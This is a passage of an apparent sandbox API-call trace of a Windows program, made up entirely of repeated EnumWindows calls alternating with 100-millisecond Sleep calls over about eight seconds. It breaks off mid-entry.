[0196.137] Sleep (dwMilliseconds=0x64) [0196.156] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.157] Sleep (dwMilliseconds=0x64) [0196.177] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.178] Sleep (dwMilliseconds=0x64) [0196.212] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.213] Sleep (dwMilliseconds=0x64) [0196.221] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.222] Sleep (dwMilliseconds=0x64) [0196.250] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.251] Sleep (dwMilliseconds=0x64) [0196.288] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.289] Sleep (dwMilliseconds=0x64) [0196.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.302] Sleep (dwMilliseconds=0x64) [0196.330] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.331] Sleep (dwMilliseconds=0x64) [0196.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.366] Sleep (dwMilliseconds=0x64) [0196.369] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.370] Sleep (dwMilliseconds=0x64) [0196.403] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.404] Sleep (dwMilliseconds=0x64) [0196.435] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.435] Sleep (dwMilliseconds=0x64) [0196.441] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.441] Sleep (dwMilliseconds=0x64) [0196.476] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.477] Sleep (dwMilliseconds=0x64) [0196.509] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.509] Sleep (dwMilliseconds=0x64) [0196.524] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.525] Sleep (dwMilliseconds=0x64) [0196.562] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0196.563] Sleep (dwMilliseconds=0x64) [0198.063] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.064] Sleep (dwMilliseconds=0x64) [0198.129] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.130] Sleep (dwMilliseconds=0x64) [0198.159] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.159] Sleep (dwMilliseconds=0x64) [0198.166] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.167] Sleep (dwMilliseconds=0x64) [0198.202] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.203] Sleep (dwMilliseconds=0x64) [0198.223] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.224] Sleep (dwMilliseconds=0x64) [0198.247] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.248] Sleep (dwMilliseconds=0x64) [0198.283] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.284] Sleep (dwMilliseconds=0x64) [0198.323] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.324] Sleep (dwMilliseconds=0x64) [0198.351] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.352] Sleep (dwMilliseconds=0x64) [0198.389] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.390] Sleep (dwMilliseconds=0x64) [0198.394] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.394] Sleep (dwMilliseconds=0x64) [0198.428] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.429] Sleep (dwMilliseconds=0x64) [0198.454] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.455] Sleep (dwMilliseconds=0x64) [0198.465] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.465] Sleep (dwMilliseconds=0x64) [0198.500] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.502] Sleep (dwMilliseconds=0x64) [0198.518] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.519] Sleep (dwMilliseconds=0x64) [0198.539] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.540] Sleep (dwMilliseconds=0x64) [0198.576] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.577] Sleep (dwMilliseconds=0x64) [0198.584] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.584] Sleep (dwMilliseconds=0x64) [0198.626] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.627] Sleep (dwMilliseconds=0x64) [0198.656] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.656] Sleep (dwMilliseconds=0x64) [0198.663] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.664] Sleep (dwMilliseconds=0x64) [0198.698] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.699] Sleep (dwMilliseconds=0x64) [0198.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.720] Sleep (dwMilliseconds=0x64) [0198.735] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.735] Sleep (dwMilliseconds=0x64) [0198.770] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.771] Sleep (dwMilliseconds=0x64) [0198.784] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.784] Sleep (dwMilliseconds=0x64) [0198.808] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.808] Sleep (dwMilliseconds=0x64) [0198.843] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.844] Sleep (dwMilliseconds=0x64) [0198.847] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.847] Sleep (dwMilliseconds=0x64) [0198.880] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.881] Sleep (dwMilliseconds=0x64) [0198.904] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.905] Sleep (dwMilliseconds=0x64) [0198.919] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.920] Sleep (dwMilliseconds=0x64) [0198.954] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.955] Sleep (dwMilliseconds=0x64) [0198.974] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.975] Sleep (dwMilliseconds=0x64) [0198.992] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0198.993] Sleep (dwMilliseconds=0x64) [0199.038] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.039] Sleep (dwMilliseconds=0x64) [0199.046] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.046] Sleep (dwMilliseconds=0x64) [0199.080] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.081] Sleep (dwMilliseconds=0x64) [0199.110] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.110] Sleep (dwMilliseconds=0x64) [0199.121] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.121] Sleep (dwMilliseconds=0x64) [0199.156] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.157] Sleep (dwMilliseconds=0x64) [0199.172] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.172] Sleep (dwMilliseconds=0x64) [0199.269] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.337] Sleep (dwMilliseconds=0x64) [0199.343] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.344] Sleep (dwMilliseconds=0x64) [0199.374] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.374] Sleep (dwMilliseconds=0x64) [0199.408] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.408] Sleep (dwMilliseconds=0x64) [0199.411] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.411] Sleep (dwMilliseconds=0x64) [0199.446] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.446] Sleep (dwMilliseconds=0x64) [0199.471] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.471] Sleep (dwMilliseconds=0x64) [0199.483] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.483] Sleep (dwMilliseconds=0x64) [0199.518] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.519] Sleep (dwMilliseconds=0x64) [0199.533] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.534] Sleep (dwMilliseconds=0x64) [0199.557] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.558] Sleep (dwMilliseconds=0x64) [0199.593] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.594] Sleep (dwMilliseconds=0x64) [0199.609] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.610] Sleep (dwMilliseconds=0x64) [0199.631] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.632] Sleep (dwMilliseconds=0x64) [0199.669] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.673] Sleep (dwMilliseconds=0x64) [0199.692] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.693] Sleep (dwMilliseconds=0x64) [0199.715] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.715] Sleep (dwMilliseconds=0x64) [0199.752] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.753] Sleep (dwMilliseconds=0x64) [0199.759] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.760] Sleep (dwMilliseconds=0x64) [0199.789] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.790] Sleep (dwMilliseconds=0x64) [0199.819] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.820] Sleep (dwMilliseconds=0x64) [0199.827] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.828] Sleep (dwMilliseconds=0x64) [0199.862] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.863] Sleep (dwMilliseconds=0x64) [0199.884] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.885] Sleep (dwMilliseconds=0x64) [0199.899] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.899] Sleep (dwMilliseconds=0x64) [0199.934] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.935] Sleep (dwMilliseconds=0x64) [0199.947] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.948] Sleep (dwMilliseconds=0x64) [0199.974] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0199.974] Sleep (dwMilliseconds=0x64) [0200.011] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.012] Sleep (dwMilliseconds=0x64) [0200.021] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.021] Sleep (dwMilliseconds=0x64) [0200.057] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.057] Sleep (dwMilliseconds=0x64) [0200.075] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.076] Sleep (dwMilliseconds=0x64) [0200.094] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.095] Sleep (dwMilliseconds=0x64) [0200.132] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.133] Sleep (dwMilliseconds=0x64) [0200.138] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.138] Sleep (dwMilliseconds=0x64) [0200.169] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.170] Sleep (dwMilliseconds=0x64) [0200.195] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.197] Sleep (dwMilliseconds=0x64) [0200.206] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.207] Sleep (dwMilliseconds=0x64) [0200.242] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.243] Sleep (dwMilliseconds=0x64) [0200.257] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.258] Sleep (dwMilliseconds=0x64) [0200.281] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.282] Sleep (dwMilliseconds=0x64) [0200.347] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.348] Sleep (dwMilliseconds=0x64) [0200.357] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.358] Sleep (dwMilliseconds=0x64) [0200.436] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.439] Sleep (dwMilliseconds=0x64) [0200.481] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.482] Sleep (dwMilliseconds=0x64) [0200.521] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.522] Sleep (dwMilliseconds=0x64) [0200.551] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.552] Sleep (dwMilliseconds=0x64) [0200.591] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.592] Sleep (dwMilliseconds=0x64) [0200.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.599] Sleep (dwMilliseconds=0x64) [0200.634] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.635] Sleep (dwMilliseconds=0x64) [0200.675] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.676] Sleep (dwMilliseconds=0x64) [0200.691] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.692] Sleep (dwMilliseconds=0x64) [0200.716] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.717] Sleep (dwMilliseconds=0x64) [0200.754] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.755] Sleep (dwMilliseconds=0x64) [0200.779] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.780] Sleep (dwMilliseconds=0x64) [0200.798] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.800] Sleep (dwMilliseconds=0x64) [0200.839] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.840] Sleep (dwMilliseconds=0x64) [0200.871] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.874] Sleep (dwMilliseconds=0x64) [0200.881] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.882] Sleep (dwMilliseconds=0x64) [0200.918] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.919] Sleep (dwMilliseconds=0x64) [0200.960] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0200.962] Sleep (dwMilliseconds=0x64) [0201.012] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.013] Sleep (dwMilliseconds=0x64) [0201.067] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.068] Sleep (dwMilliseconds=0x64) [0201.092] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.093] Sleep (dwMilliseconds=0x64) [0201.118] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.120] Sleep (dwMilliseconds=0x64) [0201.170] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.171] Sleep (dwMilliseconds=0x64) [0201.190] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.191] Sleep (dwMilliseconds=0x64) [0201.210] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.211] Sleep (dwMilliseconds=0x64) [0201.248] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.249] Sleep (dwMilliseconds=0x64) [0201.267] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.268] Sleep (dwMilliseconds=0x64) [0201.314] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.315] Sleep (dwMilliseconds=0x64) [0201.352] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.353] Sleep (dwMilliseconds=0x64) [0201.369] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.370] Sleep (dwMilliseconds=0x64) [0201.393] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.394] Sleep (dwMilliseconds=0x64) [0201.434] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.435] Sleep (dwMilliseconds=0x64) [0201.457] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.457] Sleep (dwMilliseconds=0x64) [0201.476] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.477] Sleep (dwMilliseconds=0x64) [0201.514] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.515] Sleep (dwMilliseconds=0x64) [0201.538] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.539] Sleep (dwMilliseconds=0x64) [0201.554] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.555] Sleep (dwMilliseconds=0x64) [0201.632] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.634] Sleep (dwMilliseconds=0x64) [0201.663] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.664] Sleep (dwMilliseconds=0x64) [0201.674] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.675] Sleep (dwMilliseconds=0x64) [0201.713] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.714] Sleep (dwMilliseconds=0x64) [0201.750] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.752] Sleep (dwMilliseconds=0x64) [0201.758] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.759] Sleep (dwMilliseconds=0x64) [0201.796] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.798] Sleep (dwMilliseconds=0x64) [0201.835] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.836] Sleep (dwMilliseconds=0x64) [0201.841] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.842] Sleep (dwMilliseconds=0x64) [0201.875] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.876] Sleep (dwMilliseconds=0x64) [0201.914] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.931] Sleep (dwMilliseconds=0x64) [0201.954] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0201.955] Sleep (dwMilliseconds=0x64) [0202.062] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.063] Sleep (dwMilliseconds=0x64) [0202.089] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.090] Sleep (dwMilliseconds=0x64) [0202.115] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.116] Sleep (dwMilliseconds=0x64) [0202.168] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.169] Sleep (dwMilliseconds=0x64) [0202.197] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.198] Sleep (dwMilliseconds=0x64) [0202.212] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.213] Sleep (dwMilliseconds=0x64) [0202.251] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.252] Sleep (dwMilliseconds=0x64) [0202.271] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.271] Sleep (dwMilliseconds=0x64) [0202.321] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.322] Sleep (dwMilliseconds=0x64) [0202.362] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.362] Sleep (dwMilliseconds=0x64) [0202.386] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.386] Sleep (dwMilliseconds=0x64) [0202.401] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.403] Sleep (dwMilliseconds=0x64) [0202.442] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.445] Sleep (dwMilliseconds=0x64) [0202.470] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.471] Sleep (dwMilliseconds=0x64) [0202.483] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.484] Sleep (dwMilliseconds=0x64) [0202.523] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.524] Sleep (dwMilliseconds=0x64) [0202.553] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.554] Sleep (dwMilliseconds=0x64) [0202.571] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.572] Sleep (dwMilliseconds=0x64) [0202.610] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.611] Sleep (dwMilliseconds=0x64) [0202.629] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.630] Sleep (dwMilliseconds=0x64) [0202.649] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.649] Sleep (dwMilliseconds=0x64) [0202.686] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.687] Sleep (dwMilliseconds=0x64) [0202.706] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.707] Sleep (dwMilliseconds=0x64) [0202.727] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.728] Sleep (dwMilliseconds=0x64) [0202.767] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.768] Sleep (dwMilliseconds=0x64) [0202.797] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.799] Sleep (dwMilliseconds=0x64) [0202.828] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.829] Sleep (dwMilliseconds=0x64) [0202.901] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.902] Sleep (dwMilliseconds=0x64) [0202.942] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.943] Sleep (dwMilliseconds=0x64) [0202.946] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.946] Sleep (dwMilliseconds=0x64) [0202.980] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0202.981] Sleep (dwMilliseconds=0x64) [0203.041] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.042] Sleep (dwMilliseconds=0x64) [0203.061] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.062] Sleep (dwMilliseconds=0x64) [0203.085] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.087] Sleep (dwMilliseconds=0x64) [0203.126] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.127] Sleep (dwMilliseconds=0x64) [0203.170] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.171] Sleep (dwMilliseconds=0x64) [0203.187] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.187] Sleep (dwMilliseconds=0x64) [0203.225] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.226] Sleep (dwMilliseconds=0x64) [0203.239] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.240] Sleep (dwMilliseconds=0x64) [0203.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.271] Sleep (dwMilliseconds=0x64) [0203.325] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.326] Sleep (dwMilliseconds=0x64) [0203.332] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.333] Sleep (dwMilliseconds=0x64) [0203.363] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.365] Sleep (dwMilliseconds=0x64) [0203.397] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.398] Sleep (dwMilliseconds=0x64) [0203.404] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.404] Sleep (dwMilliseconds=0x64) [0203.440] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.441] Sleep (dwMilliseconds=0x64) [0203.467] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.467] Sleep (dwMilliseconds=0x64) [0203.478] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.479] Sleep (dwMilliseconds=0x64) [0203.516] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.517] Sleep (dwMilliseconds=0x64) [0203.534] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.535] Sleep (dwMilliseconds=0x64) [0203.554] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.555] Sleep (dwMilliseconds=0x64) [0203.590] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.591] Sleep (dwMilliseconds=0x64) [0203.608] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.609] Sleep (dwMilliseconds=0x64) [0203.630] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.631] Sleep (dwMilliseconds=0x64) [0203.668] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.669] Sleep (dwMilliseconds=0x64) [0203.673] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.674] Sleep (dwMilliseconds=0x64) [0203.708] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.746] Sleep (dwMilliseconds=0x64) [0203.748] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.749] Sleep (dwMilliseconds=0x64) [0203.785] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.786] Sleep (dwMilliseconds=0x64) [0203.825] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.826] Sleep (dwMilliseconds=0x64) [0203.831] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.831] Sleep (dwMilliseconds=0x64) [0203.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.865] Sleep (dwMilliseconds=0x64) [0203.899] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.900] Sleep (dwMilliseconds=0x64) [0203.902] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.902] Sleep (dwMilliseconds=0x64) [0203.947] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0203.948] Sleep (dwMilliseconds=0x64) [0204.080] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.082] Sleep (dwMilliseconds=0x64) [0204.090] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.091] Sleep (dwMilliseconds=0x64) [0204.121] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.122] Sleep (dwMilliseconds=0x64) [0204.157] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.159] Sleep (dwMilliseconds=0x64) [0204.187] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.187] Sleep (dwMilliseconds=0x64) [0204.189] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.189] Sleep (dwMilliseconds=0x64) [0204.226] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.227] Sleep (dwMilliseconds=0x64) [0204.264] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.265] Sleep (dwMilliseconds=0x64) [0204.275] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.276] Sleep (dwMilliseconds=0x64) [0204.334] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.337] Sleep (dwMilliseconds=0x64) [0204.377] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.379] Sleep (dwMilliseconds=0x64) [0204.389] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.390] Sleep (dwMilliseconds=0x64) [0204.417] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.418] Sleep (dwMilliseconds=0x64) [0204.456] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.457] Sleep (dwMilliseconds=0x64) [0204.479] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.480] Sleep (dwMilliseconds=0x64) [0204.503] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.504] Sleep (dwMilliseconds=0x64) [0204.540] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.541] Sleep (dwMilliseconds=0x64) [0204.561] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.562] Sleep (dwMilliseconds=0x64) [0204.581] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.619] Sleep (dwMilliseconds=0x64) [0204.645] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.645] Sleep (dwMilliseconds=0x64) [0204.660] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.661] Sleep (dwMilliseconds=0x64) [0204.697] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.698] Sleep (dwMilliseconds=0x64) [0204.735] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0204.736] Sleep (dwMilliseconds=0x64) [0204.739] EnumWindows (lpEnumFunc=0x423dd0, 